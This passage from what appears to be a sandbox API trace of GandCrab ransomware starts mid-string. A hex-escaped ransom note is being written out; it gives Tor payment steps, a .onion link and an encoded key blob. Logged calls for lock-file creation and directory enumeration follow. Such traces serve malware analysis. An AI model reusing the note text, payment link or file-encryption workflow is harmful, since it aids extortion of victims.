6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.088] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0069.089] CloseHandle (hObject=0x230) returned 1 [0069.089] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.089] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.089] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x18e)) [0069.089] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.089] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.090] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.090] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\d2ca4a09d2ca4deb61a.lock") returned 54 [0069.090] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0069.091] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.092] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.092] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\") returned 30 [0069.092] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\*" [0069.092] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5038f8 [0069.092] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.092] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0069.093] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.093] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.093] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0069.093] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.093] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.093] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: 